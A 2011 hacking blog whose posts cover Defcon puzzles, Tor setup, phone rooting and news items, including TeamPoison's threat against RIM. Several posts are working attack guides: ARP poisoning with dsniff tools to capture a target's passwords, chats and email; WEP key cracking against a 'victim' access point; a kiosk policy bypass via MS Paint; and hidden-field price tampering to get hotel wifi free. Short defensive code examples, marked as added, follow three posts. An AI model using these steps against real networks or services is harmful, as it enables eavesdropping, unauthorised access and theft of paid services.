2011-08-31

(!) Driftnet + ARP Poisoning = OverLord

These are the command line tools we will be using to spoof our subject into thinking that we are the router, so that it sends all of its network traffic through us.

Tools: dsniff suite and driftnet.
on Ubuntu: apt-get install driftnet dsniff

Before we get our attack started we’ll need to enable packet forwarding. This means we’ll allow the traffic of our subjects to flow through our machine. We need to switch on ip_forwarding.

1. To check the current setting type: cat /proc/sys/net/ipv4/ip_forward
if you get a "0", it is currently off.

2. Type the following to turn it on: echo 1 > /proc/sys/net/ipv4/ip_forward
"1" being to switch it on.

3. Then you can check again: cat /proc/sys/net/ipv4/ip_forward

4. Now we have to set up the traffic flow using arpspoof. The switch "-t" means target.

arpspoof -t 10.10.10.1 10.10.10.99 - watch traffic from x.x.x.1 (router) to x.x.x.99 (host)
We'll also do the reverse to watch traffic going the opposite direction:
arpspoof -t 10.10.10.99 10.10.10.1

5. Let the fun begin: OverLord!
msgsnarf -i eth0 - will watch chat sessions and messenger clients (yahoo,gmail,irc...etc)
urlsnarf -i eth0 - will watch URLs used by the subject
mailsnarf -i eth0 - will watch for emails
dsniff -i eth0 - will watch for passwords
driftnet -i eth0 - will watch for pictures on the net

6. To shut down all: killall arpspoof
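
From the defender's side, the poisoning in step 4 shows up in the subject's own neighbor table: the router's IP starts resolving to another host's MAC address. The following is an added example, not part of the original post; it parses "ip neigh show" output and flags that condition. The sample tables and MAC addresses are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `ip neigh show` output as seen on the host 10.10.10.99 from the
# post. The MAC addresses are made up for this example.
NEIGH_BEFORE = """\
10.10.10.1 dev eth0 lladdr 00:11:22:aa:bb:01 REACHABLE
10.10.10.50 dev eth0 lladdr 00:11:22:aa:bb:50 STALE
10.10.10.77 dev eth0  FAILED
"""
# Same host while the gateway entry is poisoned by 10.10.10.50: the router's
# IP now resolves to the MAC of the spoofing machine.
NEIGH_DURING = """\
10.10.10.1 dev eth0 lladdr 00:11:22:aa:bb:50 REACHABLE
10.10.10.50 dev eth0 lladdr 00:11:22:aa:bb:50 REACHABLE
10.10.10.77 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\b"
)


def parse_neigh(text):
    """Return {ip: mac} for IPv4 entries that have a resolved MAC address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # unresolved entries (FAILED/INCOMPLETE) carry no lladdr
            table[m.group("ip")] = m.group("mac").lower()
    return table


def shared_macs(table):
    """Return {mac: [ips]} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {
        mac: sorted(ips, key=ipaddress.ip_address)
        for mac, ips in by_mac.items()
        if len(ips) > 1
    }


def check_gateway(table, gateway_ip, baseline_mac):
    """Compare the gateway entry with a MAC recorded while the network was clean."""
    findings = []
    baseline = baseline_mac.lower()
    current = table.get(gateway_ip)
    if current is None:
        findings.append(f"no ARP entry for gateway {gateway_ip}")
    elif current != baseline:
        findings.append(f"gateway {gateway_ip} changed MAC: {baseline} -> {current}")
    for mac, ips in shared_macs(table).items():
        if gateway_ip in ips:
            others = [ip for ip in ips if ip != gateway_ip]
            findings.append(f"gateway shares MAC {mac} with {', '.join(others)}")
    return findings


if __name__ == "__main__":
    for label, text in (("before", NEIGH_BEFORE), ("during", NEIGH_DURING)):
        print(label, check_gateway(parse_neigh(text), "10.10.10.1", "00:11:22:aa:bb:01"))
```

Pinning the gateway with a permanent neighbor entry on the host, or enabling Dynamic ARP Inspection on the switch, makes the forged replies ineffective.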

2011-08-30

Crack a WEP!

I've been trying different combinations of cracking a WEP key. Each "experiment" requires a different strategy, each subject needs to be poked a little different from the other. The instructions below might or might not work. But it does work most of the time. It works very well when a client is connected to the AP, but of course you can fake that also.

I recommend changing your monitoring interface's MAC address for anonymity and to make it easy to remember - example 11:22:33:44:55:66. You can use MACCHANGER if needed.

1. set the interface in monitor mode - airmon-ng start [interface]
2. to recon the air waves use airodump-ng: airodump-ng [interface]
3. pick the victim and take note of the SSID, channel and mac address.
4. stop airodump-ng, then restart it with the write option to start catching the IVs. - airodump-ng -c [channel] -w [filename] [interface]
5. Now we need to inject some "care packages" to generate some IV's. This is where you should get creative. Take your pick.

NOTE: to test the subject's ability for packet injection, use the following code. You are looking for a 100% injection result - aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]

Fake associations for the vic. AP:
aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]
or use this for picky access points:
aireplay-ng -1 6000 -o 1 -q 10 -e [vic ssid] -a [vic mac] -h [your mac] [interface]

You have to get a successful association before you can continue. Your ARP request replay packets will not generate any IV's if you are not associated with the AP.

Send out ARP request replay mode:
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]

6. Start cracking - aircrack-ng [filename], pick the vic SSID, then go.
Note: you can use the FMS/Korek method by adding -K on the code above.

You will need approx. 250,000 IV's for a 64 bit key, 1.5M IV's for a 128 bit key. For the PTW method, you'll need 20,000 packets for 64 bit and 40,000 packets for 128 bit.

This is strictly for educational purposes only. Set up your own lab or crack your own Wifi for pen testing purposes.

2011-08-26

Root the AT&T Inspire 4G

THIS GUIDE HAS NOT BEEN TESTED. PLEASE DO YOUR RESEARCH BEFOREHAND TO PREVENT BRICKING YOUR PHONE. THIS IS A WORK IN PROGRESS.

This guide will walk you through the process of taking the AT&T Inspire 4G from stock to having the ability to flash a custom recovery image & the latest version of CyanogenMod.

STEP 1: Before you do anything — Make a backup
Don't forget to back up your data. If you synced the device with a Google account, then the contacts, calendar, Gmail, & select other Google-related data will not be lost and will come back when you sync your phone to Google.

However, you should backup anything you want to keep that is not stored on the SD card: SMS/MMS messages, Call Log, Bookmarks, Applications, pictures...etc. You can use Titanium Backup or the Astro File Manager. Any application data not on the SD card will be lost. It would also be a good idea to backup everything stored on the SD card in the rare case the SD card must be formatted to resolve any major problems. MyBackup Root, SMS Backup & Restore, and Call Backup & Restore are all free applications that can assist with backing up your data.

STEP 2: Root the HTC Inspire 4G - AT&T
Warning: Rooting the AT&T Inspire 4G will void the warranty.
      2.1 Downgrade to 1.32.405.6 - To root the AT&T Inspire 4G you need to downgrade the device to a copy of the firmware on the international HTC Desire HD. Download the firmware to your PC.
      2.2 Create a goldcard - In order to downgrade the AT&T Inspire 4G to the firmware of the HTC Desire HD, you will need to create a goldcard.
     2.3 You will need an ADB shell on your PC - Follow the Android SDK guide, to get the ADB shell on the computer.

2011.0914: Installation of the Android SDK and ADB is not included in this guide.  You can google how to install those two, and you will find a number of instructions.  There are a few caveats you have to be aware of.

- Android SDK Installation bug:  Download the Android SDK and the JAVA SE.  Start by installing JAVA.  It should be straight forward no fuss installation.  Then install the Android SDK, if you are running Win 7, right-click the installation file and "Run as Administrator".  This simple step eliminates a lot of issues during installation. 

The Android SDK installer will tell you that you do not have the Java SE installed, you right genius!!! Simple fix:  click "Back" - to bring you to the previous installation page, then click "Next".  The installer should now pick up the installed Java SE kit.
     2.4 Download psneuter, misc_version 0.01 & the 1.32.405.6 firmware: 

psneuter (md5: 89c2dec8d72d87b4c669f44dd31c8d17)
misc_version 0.02 (md5: 1f40aaf88d1bf15775631a58c4361218)
1.32.405.6 firmware (md5: d5067eaad6d447797a67828b567901af)

     2.5 Unzip the psneuter & misc_version package to the same folder as adb (the /platform-tools folder within the Android SDK folder).
     2.6 Connect the AT&T Inspire 4G to the computer via USB. On the computer, open the terminal and run the following commands:

adb push psneuter /data/local/tmp/
adb push misc_version /data/local/tmp/
adb shell chmod 777 /data/local/tmp/psneuter
adb shell chmod 777 /data/local/tmp/misc_version
adb shell /data/local/tmp/psneuter
adb shell /data/local/tmp/misc_version -s 1.31.405.3
exit

[NOTE: You should have the "#" sign instead of the "$". If you do, you have temporary root, and can continue on.]

     2.7 Copy the 1.32.405.6 firmware to the root of the SD card (NOT in any folders). On the computer, open terminal and run the following command:

adb reboot bootloader

      2.8 Uninstall VISIONary if it is installed on the HTC Inspire.
     2.9 Follow the on screen directions for flashing the 1.32.405.6 firmware. Once finished you can continue to the next section - Root, S-OFF, the ClockworkMod Recovery & the Engineering HBoot
     2.10 You will need ADB on the computer to root the AT&T Inspire 4G and to flash the necessary files for radio S-OFF. Follow the Android SDK guide, to get the ADB shell on the computer.
     2.11 Download busybox, the ClockworkMod Recovery, the Engineering HBoot, gfree 0.07, psneuter, root_psn, Superuser package:

busybox: (md5: 25c5db694c987995909cc3166d4f01b0)
ClockworkMod Recovery ()
Engineering HBoot: (md5: b2c8834905bfa2349f5223077493140a)
gfree 0.7: (md5: 6916cf05b0805aeac9effdc1725aaa12)
psneuter: (md5: 89c2dec8d72d87b4c669f44dd31c8d17)
root_psn: (md5: c8fe38ef55eb8951def9ff17b2eb99c1)
Superuser package: (md5: 43d9a40b63e916635d5ad7ca32433fab)

      2.12 Unzip the zip files and copy the contents to the same folder as adb (the /platform-tools folder within the Android SDK folder). Connect the AT&T Inspire 4G to the computer via USB. Make sure USB debugging is enabled on the AT&T Inspire 4G by checking Settings » Applications » Development » USB debugging.
      2.13 On the computer, open terminal and run the following commands:

adb push busybox /data/local/tmp/
adb push gfree /data/local/tmp/
adb push hboot-eng.img /data/local/tmp/
adb push psneuter /data/local/tmp/
adb push recovery-clockwork-3.0.2.6-ace.img /data/local/tmp/recovery.img
adb push root_psn /data/local/tmp/
adb push su /sdcard/
adb push Superuser.apk /sdcard/
adb shell chmod 755 /data/local/tmp/*
adb shell /data/local/tmp/psneuter

NOTE: You will drop out of the shell after this command.
Restart the shell using:
adb shell
cd /data/local/tmp

./busybox md5sum /dev/block/mmcblk0p18
[Write down this number, we will need it later. For the remainder of this guide, we will refer to this number as md5 #1.]

./gfree -f -b hboot-eng.img -y recovery.img
./root_psn
sync
[This may take a moment, just give it some time.]

./busybox md5sum hboot-eng.img
[Write down this number - this will be md5 #2]
./busybox md5sum /dev/block/mmcblk0p18
[Write this number down - this will be number md5 #3]

If md5 #1 & md5 #3 match, then gfree 0.07 failed to powercycle the eMMC chip on the device. Either the software version is too high and the device was not downgraded per the previous section, or you have to use the gfree 0.05 instead. Download gfree 0.05, reboot and attempt again.

gfree 0.5: [md5: 74aec166f591ec5d25d898a903570931]
If md5 #2 & md5 #3 match, then everything should be fine and you continue on. If md5 #3 does NOT match md5 #1 or md5 #2, then DO NOT REBOOT and join #G2Root on Freenode for further help.

     2.14 reboot

The AT&T Inspire 4G is now rooted with S-OFF, the Engineering HBoot & the ClockworkMod Recovery.


STEP 3: Flashing CyanogenMod
----------------------------------------
Method via Recovery
Download the latest version of CyanogenMod.

Optional:
Download the Google Apps for the device.
Place the CyanogenMod update.zip file on the root of the SD card.

Optional:
Place the Google Apps .zip on the root of the SD card also.
Boot into the ClockworkMod Recovery.
Once the device boots into the ClockworkMod Recovery, use the side volume buttons to move around, and either the power button or the trackball to select.

Optional:
Select backup and restore to create a backup of current installation on the HTC Ace.
Select the option to Wipe data/factory reset.
Then select the option to Wipe cache partition.
Select Install zip from sdcard.
Select Choose zip from sdcard.
Select the CyanogenMod update.zip.

Optional:
Install the Google Apps by performing steps 7 - 9 again and choosing the Google Apps update.zip. Once the installation has finished, select +++++Go Back+++++ to get back to the main menu, and select the Reboot system now option. The HTC Ace should now boot into CyanogenMod.

***
Method via ROM Manager
Launch RomManager.

Optional:
Choose the first option in the app, Flash ClockworkMod Recovery to update to the latest version.
Select the Download ROM option from the main menu in the ROM Manager.
Select the CyanogenMod option, and then choose the latest version of CyanogenMod from the menu.

Optional:
When you select the latest version of CyanogenMod, check the Google Apps* option. Once the ROM is finished downloading, it asks if you would like to Backup Existing ROM and Wipe Data and Cache. If Superuser prompts for root permissions check to Remember and then Allow.

The HTC Ace will now reboot into the recovery, wipe data and cache, and then install CyanogenMod. When it's finished installing it will reboot into CyanogenMod.

 
Retrieved from Wiki CyanoGenMod - AT&T Inspire 4G: Rooting
  
******
Additional Rooting resources I found on the web.  These are untested, but review them for reference and a better understanding of the process:

HTC Inspire 4G Simple Root and S-Off 
AndroidAuthority.com (how-to-root-att-inspire-4g)  
PhonesArchive.com (how-to-root-your-atat-htc-inspire-4g-tutorial)

2011-08-25

Tor on BT5 (squeeze/sid)

Check your BT5 version: cat /etc/debian_version
You can also display the distribution version by: lsb_release -a

According to the author, the instructions are for the "squeeze" version of BT5.

C&P from http://www.binbert.com/blog/2011/06/how-to-install-tor-on-backtrack-5/
kudos to the writer, although I have not tested this on my own, it looks good.

Tor is an open source Anonymous Internet tool. It protects your personal identification from tracking systems by changing the source IP address frequently. Application will create many virtual tunnels through the tor network.

By default Tor is not integrated in BackTrack 5. Why use Tor on Backtrack? Normally Tor is used to protect the browsing security but Tor can be used for network scanning tools and other information gathering tools, in my next article I will explain how to configure Tor for console applications.

Follow the installation steps:

Open /etc/apt/sources.list file and add following line
deb http://deb.torproject.org/torproject.org squeeze main
if you have "lucid", you can try to enter: deb http://deb.torproject.org/torproject.org lucid main

Open command prompt and run following commands
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
apt-get update
apt-get install tor tor-geoipdb
apt-get install privoxy


After installing Privoxy, open /etc/privoxy/config and append the following line

forward-socks4a / 127.0.0.1:9050 .

/etc/init.d/privoxy start


Configure your clients with IP address 127.0.0.1 and port 8118

To check if you are on the onion network, go to http://cmyip.com or http://www.whatismyip.com to know your current ip address.

2011-08-24

Access a Windows Shell from MS Paint (Windows 7)

Bypass restrictions, like Group Policies set up by the network administrator, and get to the shell by using MS Paint. This is handy if the command prompt is hidden from a kiosk machine and you have access to MS Paint. Of course, after you get to the shell, you will still need to know what to do with it to "test" stuff.

There is a certain image size with the correct combination of RGB entries that will allow you to generate a file which basically fires up the Windows shell. Here we go.

1. Fire up MS Paint.
2. Create a new image. In "Image Properties", change the size of the image to Width = 6 and Height = 1 (6x1 pixels).
3. Zoom in to the image, then Edit the colors (see below)
4. You will need to create 4 custom colors to fill up the image 1 pixel at a time, 6 times. Use 1 of the custom colors for each pixel. The color settings for each pixel are listed below.

(1st pixel)
Red = 10
Green = 0
Blue = 0

(2nd pixel)
Red = 13
Green = 10
Blue = 13

(3rd pixel)
Red = 100
Green = 109
Blue = 99

(4th pixel)
Red = 120
Green = 101
Blue = 46

(5th pixel)
Red = 0
Green = 0
Blue = 101

(6th pixel)
Red = 0
Green = 0
Blue = 0

5. Save this as a bitmap file (24-bit Bitmap (*.bmp)) - name it "command.bmp"
6. Rename the "command.bmp" file to "command.bat"

Notable Tools:
mh-nexus.de/en/hxd (for Windows) - you can actually edit the hex and add additional commands after cmd to customize the batch file. Nifty little trick, you just have to remember 6 sets of RGB values. peace out! pentest responsibly!
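
Why the six colors matter, and how to spot the result: a 24-bit bitmap stores each pixel as Blue, Green, Red, so the values above land in the file as plain text, while the renamed file still begins with the bitmap header. The following is an added example, not part of the original post; it decodes the pixel bytes and flags script-named files that are really bitmaps. The in-memory sample is constructed from the values listed above, and the function names are this example's own.

```python
import re
import struct

# The six Red/Green/Blue triples from the post, in pixel order.
POST_PIXELS = [(10, 0, 0), (13, 10, 13), (100, 109, 99),
               (120, 101, 46), (0, 0, 101), (0, 0, 0)]

SCRIPT_EXTS = (".bat", ".cmd")


def sample_bmp(pixels):
    """Constructed in-memory sample: a one-row 24-bit BMP holding `pixels`."""
    # 24-bit BMP rows store each pixel as Blue, Green, Red and pad to 4 bytes.
    row = b"".join(bytes((b, g, r)) for r, g, b in pixels)
    row += b"\x00" * (-len(row) % 4)
    file_hdr = struct.pack("<2sIHHI", b"BM", 54 + len(row), 0, 0, 54)
    info_hdr = struct.pack("<IiiHHIIiiII", 40, len(pixels), 1, 1, 24,
                           0, len(row), 2835, 2835, 0, 0)
    return file_hdr + info_hdr + row


def bmp_pixel_bytes(data):
    """Return the raw pixel bytes if `data` is an uncompressed 24-bit BMP, else None."""
    if len(data) < 54 or data[:2] != b"BM":
        return None
    offset, = struct.unpack_from("<I", data, 10)       # start of pixel array
    dib_size, = struct.unpack_from("<I", data, 14)     # BITMAPINFOHEADER is 40
    bpp, compression = struct.unpack_from("<HI", data, 28)
    if dib_size < 40 or bpp != 24 or compression != 0 or offset > len(data):
        return None
    return data[offset:]


def printable_runs(data, min_len=4):
    """Return runs of printable ASCII, like the `strings` utility."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def inspect_file(name, data):
    """Flag a file that has a script extension but is structurally a bitmap."""
    findings = []
    pixels = bmp_pixel_bytes(data)
    if pixels is None or not name.lower().endswith(SCRIPT_EXTS):
        return findings
    findings.append(f"{name}: script extension on a file with a BMP header")
    for text in printable_runs(pixels):
        findings.append(f"{name}: pixel data contains text {text!r}")
    return findings


if __name__ == "__main__":
    bmp = sample_bmp(POST_PIXELS)
    print(bmp_pixel_bytes(bmp))
    for line in inspect_file("command.bat", bmp):
        print(line)
```

Hiding the command prompt does not address this; an execution policy on the kiosk (for example AppLocker script and executable rules) does.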

2011-08-19

Complimentary Wifi for You and Me.

Successfully tested in Hilton Honors Hotel Wifi. Yes, I know, I know... wifi should be free for everyone. All a decent geek wants to do on a vacation is find information on where he can spend his money... food, entertainment and shopping. Internet access is crucial to get this information. Yes, I know what you are thinking... use the office mifi? or broadband mobile connection... oh yeah? not business related? So here's how, it's simpler than you think... a total no brainer and totally the fault of the designer of the website.... there is absolutely no security. Believe me, I've tested this and it works.

tools needed: Firefox with Firebug add-on.
1. fire up firefox, and the hotel website shows up. it'll have a choice of connection length and cost for each.
2. for initial testing purposes, pick the cheapest choice ($2.95 for an hour).
3. choose "bill-to-room"
4. for the last name and room, type in a bogus last name (ex. BUNNYBEAR). - do not use your real last name on this round. The purpose of this is to stop the process midway so we can inject our changes.
5. for the room number, enter your real room number.
6. press connect, and a page will show up with the summary of your bill - $2.95 for 1 hour, but an error will show saying that the last name does not match with the room number.
7. activate FireBug, and navigate to the HTML tab. (note: activate on a new window)
8. search for "2.95", Firebug search should find it by the "value=2.95" code. change the value to "0.00".
9. go back to the web page. at this point it should still say $2.95 on the cost. there should be 2 buttons at the bottom of the web page, "BACK" and "CONNECT", click - CONNECT.
10. once again it will try to connect but since the last name is still wrong, it will go back to the error page. But now check the total amount, it is now "Complimentary".
11. now change the last name to the correct last name registered to the room number...click connect, and welcome to the jungle!

NOTES: I have not tried this on the higher priced options, but I figure the logic is the same and it should work as well. Now why did this work? Just like what I have preached before... sequence of events.
1. Initial page with options, created and choices packaged into the next page. The initial page usually has coupons and complimentary code options on it.
2. The 2nd page bundles the options for evaluation and confirmation to the connection page.
3. We modified the 2nd page to change the cost but made sure that half the info fails validation (wrong last name). This regenerates the 2nd page to now have a complimentary cost on a legitimate page.
4. after we correct the last name, all the info on the page is now accurate and should pass the confirmation. in essence the web site itself re-packaged the whole page to go through properly. game over.pwned. trip ninja. 3l33t.
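
The root cause in the sequence above is that the amount travels through the browser and is trusted on the way back. The following is an added example, not the hotel portal's code; it puts that pattern beside the fix, where the server derives the price from the plan id and ignores any amount the client sends. The plan ids, the second plan, the room number and the guest name are constructed for illustration.

```python
from decimal import Decimal, InvalidOperation

# Constructed data: the post names only the $2.95 one-hour option; the plan
# ids, the second plan and the guest record are made up for this example.
PLANS = {"1h": Decimal("2.95"), "24h": Decimal("9.95")}
GUESTS = {"1204": "SMITH"}


def price_label(amount):
    return "Complimentary" if amount == 0 else f"${amount}"


def name_matches(form):
    return GUESTS.get(form.get("room")) == form.get("last_name", "").strip().upper()


def confirm_trusting_client(form):
    """Vulnerable pattern: the amount comes back from a hidden form field."""
    amount = Decimal(form["amount"])
    ok = name_matches(form)
    return {
        "connected": ok,
        "billed": amount if ok else None,
        "summary": price_label(amount),
        # On a validation error the page is rebuilt from what was submitted,
        # so an edited amount is carried forward as if the server had set it.
        "next_form": dict(form),
    }


def confirm_server_side(form):
    """Hardened pattern: the price is looked up on the server from the plan id."""
    price = PLANS.get(form.get("plan"))
    if price is None:
        return {"connected": False, "billed": None, "summary": "Unknown plan",
                "tamper_alert": True, "next_form": {}}
    try:
        # A client-supplied amount is never used for billing, only compared
        # with the catalogue so that a mismatch can be logged.
        tampered = "amount" in form and Decimal(form["amount"]) != price
    except InvalidOperation:
        tampered = True
    ok = name_matches(form)
    return {
        "connected": ok,
        "billed": price if ok else None,
        "summary": price_label(price),
        "tamper_alert": tampered,
        # The re-rendered form carries no amount field at all.
        "next_form": {k: form.get(k, "") for k in ("plan", "room", "last_name")},
    }


def replay_edited_form(handler):
    """Send `handler` the two submissions from the post: edited amount with a
    wrong last name, then the re-rendered form with the name corrected."""
    first = handler({"plan": "1h", "amount": "0.00",
                     "room": "1204", "last_name": "BUNNYBEAR"})
    second = handler(dict(first["next_form"], last_name="Smith"))
    return first, second


if __name__ == "__main__":
    for handler in (confirm_trusting_client, confirm_server_side):
        first, second = replay_edited_form(handler)
        print(handler.__name__, first["summary"], second["billed"])
```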

The intent of this blog entry is to pentest and see if this bug is still out there, and it is. This is not for financial gain or stealing, I am not a black hat. It's just amazing that until now they still have this bug. This hole in shopping carts was discussed at least 10 years ago, just incredible.



2011-08-10

Defcon 19 Badge and Lanyard

In my previous blog post I mentioned the binary code and titanium badges. They both hold clues to something. The Defcon program also holds a number of clues. Here's a pic of this year's badge - Defcon 19 Badge

Defcon 19 Random Numbers on Posters

Clues maybe? Here they are in case you were not able to get them last weekend. Found at the bottom of a few Defcon posters, they were easy to miss. Unless, you ran into a small crowd staring at them...

Top Row: 35 4 24 4 29 4 104 62 33 104 4 56 24 47 62 33 104 4 56 24 47 62 69 4 16 47 62 64 104 56 84 4 73 4 84 69 84 24 24 58 35 64 104 99 64 29 56 24 47

Bottom Row: 62 69 4 84 11 35 99 4 62 4 104 99 4 4 56 4 84 33 16 58 69 94 4 69 69 33 39 4 104 99 4 62 4 99 24 45 24 4 69 104 99 47 1 24 11 99 24 62 62 24 62

Here's a picture of what it looked like on the poster itself - Defcon 19 Poster

2011-08-09

Hacking encouraged at Defcon hacker convention

a Defcon 19 article from Reuters

LAS VEGAS: There was a whole lot of hacking going on in Sin City this weekend – and right under the noses of federal agents.

But in a sign of a time when cybersecurity is at the forefront of national security concerns, the feds were not lurking in the shadows to keep a watchful eye. They came as invited guests at the Defcon hacker convention in Las Vegas, which drew more than 10,000 attendees in its 19th year.

At Defcon, computer wizards test their skills against each other for bragging rights and prizes. No name tags are issued and hackers identify themselves only by one-word handles.

High-profile attacks on government and corporate computer systems disclosed this summer have pushed hackers increasingly into the public eye. Meanwhile, government agencies are wooing hackers to join them in fighting such intrusions.

The Defcon crowd made for an interesting mix.

It had its fair share of mohawk haircuts that would make a rainbow proud, along with tattoos and piercings but it mostly looked like a campus of geeks let loose in a Las Vegas hotel to do what they consider fun: decipher mind-bending puzzles, starting with the convention badge.

Made of titanium – organizers say they depleted the country’s stock of the raw material – the badge had a cut-out of the Egyptian mathematical symbol the Eye of Ra, and a letter and number. It offered a clue to a puzzle.

Other clues were contained in a large decoder wheel on the floor where a golden pyramid with symbols was encircled by letters coupled with numbers. More clues were salted in the program booklet and strewn throughout the convention center.

A hacker who goes by the moniker “LosT” designed the game and offered some helpful hints: 10 people had badges with a Z and a number. Oh, and find someone to translate Chinese.

“I pulled in so many different disciplines that no single person can really do it by themselves unless they are a weirdo like me,” said LosT, an engaging mathematician/engineer with blue hair and a goatee.

GETTING A BAD RAP?

The game illustrates the intellect of the attendees, who see hacking as a skill for problem-solving and do not welcome the notoriety generated by some bad apples breaking laws.

Hackers are “people who like a challenge. We don’t do crime, we’re not criminals,” said “mournewind” from West Virginia. “People have this opinion that hackers do illegal things and that’s not really a good thing.”

Hacking, for example, can help improve commercial products, he said. “We break an iPhone to make Apple make it better.”

Hackers pointed out that criminals exist in all professions and they should not all be painted by that broad brush.

“I think hackers have always gotten a bad name,” said “pwrcycle,” whose business card labels him an “Ethical Hacker.”

“Those are the people who think outside the box. The epitome of free thinkers.”

He objected to the term “cyber wars,” saying there was danger in calling what was essentially a crime in which no one died a war, with its suggestion that military might could be used on basically thugs, bullies and mobsters.

“What most people are trying to say is we want to stop espionage,” he said. “He’s not trying to kill you, he just wants to pick your pocket.”

At the start of a panel of cyber investigators from the Air Force, Navy, Army and NASA, a burly man called “Priest,” who said he entered government service after the September 11 terrorist attacks, advised the audience that if they wanted a government job the key was to stay out of jail, go to college and not do drugs.

The panelists said there was a debate in their world about whether it was better to turn a cop into a cyber specialist or turn an information technology expert into a cop.

“I think you just need to be a geek who knows how to talk to people,” said Ahmed Saleh, special agent in NASA’s computer crimes division.

“We have a little bit of both. We have a little bit of the geeks who became cops and the cops who became geeks, or nerds or whatever words you want to use,” he said.

The panel started with a “spot the Fed” contest in which the audience had to guess which of four women on stage was a federal agent.

Most of the audience picked the one who said her favorite president was Ronald Reagan. Wrong. It was the one who said her childhood dream was to be a pilot.

LET THE GAMES BEGIN

One sure way to catch the attention of would-be employers is to win the prestigious “Capture The Flag” contest.

This year 12 teams huddled with laptops in a low-lit room all day, hacking each other.
The competition is all about “attack and defense,” explained “Factor,” who was part of the defending champion team ACME Pharm. The attacker’s goal is to find vulnerabilities while the defender tries to prevent the holes from being exploited.

“You are amongst gods,” Factor said. “This is the Olympics.”

He shrugged off as “hype” the negative image of hackers as criminals and said the public should not believe everything it reads.

“There are good hackers, there are bad hackers,” he said. “And some of us have kids.”

Other competitions included “Hacker Jeopardy,” “Crack Me If You Can” and “Hack Fortress.”

But one required absolutely no computer savvy and got a little hairy — best beard, mustache, partial beard, and fake beard.

BlackBerry blog hacked after RIM helps police in London riots

From LA Times by Nathan Olivarez-Giles

Research In Motion's Inside BlackBerry blog was hacked on Tuesday after the Canadian smartphone maker said it would cooperate with London police who are investigating the role of BlackBerry users in the city's last three days of riots.

In a message on Twitter on Monday, RIM said that the company feels "for those impacted by the riots in London. We have engaged with the authorities to assist in any way we can."

That decision didn't sit well with a hacking group going by the name TeamPoison, which claimed responsibility for hacking into the BlackBerry blog and posting its logo and a statement condemning RIM's cooperation with police who're looking to track those who took part in the riots and used BlackBerry Messenger as a way to communicate.

BlackBerry Messenger has reportedly become a favored mode of communication in the London riots since the service is private, pin-code protected and can only send messages between BlackBerry phones. Twitter too is also reportedly being used widely by rioters.

Jonathan H Fisher, a Twitter user, published a screenshot of the blog hacked and published it on the social networking service, which can be seen in the image above.

The statement published during the hack of the Inside BlackBerry blog read partly as a plea to RIM to stop working with police and partly a threat against the company if it continues its cooperation:

Dear RIM,

You Will _NOT_ assist the UK Police because if u do innocent members of the public who were at the wrong place at the wrong time and owned a blackberry will get charged for no reason at all, the Police are looking to arrest as many people as possible to save themselves from embarrassment…. if you do assist the police by giving them chat logs, gps locations, customer information & access to peoples BlackBerryMessengers you will regret it, we have access to your database which includes your employees information; e.g – Addresses, Names, Phone Numbers etc. – now if u assist the police, we _WILL_ make this information public and pass it onto rioters…. do you really want a bunch of angry youths on your employees doorsteps? Think about it…. and don't think that the police will protect your employees, the police can't protect themselves let alone protect others….. if you make the wrong choice your database will be made public, save yourself the embarrassment and make the right choice. don' be a puppet..

TeamPoison then went on to state that it didn't stand behind the riots, except for the parts in which civilians fight with law enforcement:

p.s – we do not condone in innocent people being attacked in these riots nor do we condone in small businesses being looted, but we are all for the rioters that are engaging in attacks on the police and government…. and before anyone says "the blackberry employees are innocent" no they are not! They are the ones that would be assisting the police.

Officials at RIM were unavailable for comment on the hacking, but the RIM blog wasn't available for much of the morning, although the blog currently seems to be back up and running.

Adobe Flash Movie Links Fail Fix

Movies don't appear in browser after installing Flash Player
(i know this is not a hack, but this is a vault where I can go back later to look for fixes)

Issue
After you install a previous version of Flash Player, movies don't appear in the browser as expected. Sometimes, you receive the following error: "Object doesn't support this property or method."

Solutions
Do one of the following:
Solution 1: Install Flash Player 10.1.102.64 or later. Download Flash Player 10.1.102.64 or later from the Flash Player Download Center.

Solution 2: Manually remove the "kill bit" registry entry.

>> standard disclaimer just in case you blue screen your box <<
"Important: Adobe does not recommend manually editing the Windows registry unless you are already familiar with the Windows registry editor. Proceed with caution, and only if you feel confident changing the registry. Incorrectly modifying the Windows registry can result in serious Windows or application performance issues. Adobe Technical Support cannot be responsible for problems caused by modifications made to the Windows registry."

Note: If you are not comfortable editing the Windows registry, there are third-party applications available that can edit the registry. Spyware removal applications sometimes have tools that look for Flash Player registry entries and remove unnecessary items.

To manually remove the "kill bit" entry from the registry, look for the following registry item:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11CF-96B8-444553540000}\

Make sure that this registry item doesn't contain any strings. If there is a string value, it is most likely a set of compatibility flags. This entry causes Flash movies to fail in the browser. Delete the compatibility flags entry and restart Internet Explorer.

Alternatively, you can also set the Value data to zero for Compatibility Flags.
Double-click Compatibility Flags, set Value data to zero and click OK.

Additional information
A "kill bit" entry in the Windows registry causes this error. Ad and pop-up blocker installations usually create this registry key. Uninstalling the pop-up blocker doesn't necessarily remove this registry entry.

2011-08-06

Defcon 19 - Hacker Jeopardy!

Defcon 19 HackerJeopardy.... G Mark had prompted with activate Windows. Vanna Vinyl this year is awesome.

with @snubs at Defcon 2011

Glad to have met Darren and Shannon at Defcon 19. Always enjoyed and learned a lot from them through their podcast http://www.hak5.org  I've been watching them since the 1st hak house days.

Defcon 19 Pyramid Cipher

Found at the Defcon 19 Rotunda, between the Registration Desk & the Swag booth. I saw tweets this morning that a foot print sticker was added on Sunday.

1 D
4 E
11 F
16 C
24 O (foot print)
29 N
33 A
35 W
39 G
45 B
